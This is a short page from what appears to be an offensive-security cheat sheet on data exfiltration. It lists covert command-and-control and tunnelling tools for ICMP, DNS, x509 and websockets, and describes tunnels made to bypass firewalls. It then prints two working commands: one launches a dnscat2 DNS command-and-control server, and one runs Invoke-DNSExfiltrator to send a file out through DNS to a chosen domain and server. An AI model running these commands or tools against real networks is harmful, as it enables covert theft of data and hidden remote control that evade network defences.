Skip to content

Data Exfiltration

Data Exfiltration

C2C Server through websockets
Exfiltrate data with ICMP
PoC for transferring a file over x509
Powershell C2 Server and Implants
Covert C2C Server
DNS-Shell is an interactive Shell over DNS with python
Tunnel UDP Traffic as Encrypted UDP/FakeTCP/ICMP Traffic using Raw Socket to Bypass UDP FireWalls
NAT to NAT communication through firewalls

DNSCat

Encrypted command-and-control (C&C) channel over the DNS protocol, which is an effective tunnel out of almost every network.

docker run --rm -ti --privileged -p 53:53/udp -e DOMAIN_NAME="your_domain_name" --name dnscat2 arno0x0x/dnscat2

DNSExfiltrator

Exfiltrate data with DNS

c:\DNSExfiltrator> powershell
PS c:\DNSExfiltrator> Import-Module .\Invoke-DNSExfiltrator.ps1
PS c:\DNSExfiltrator> Invoke-DNSExfiltrator -i inputFile -d mydomain.com -p password -s my.dns.server.com -t 500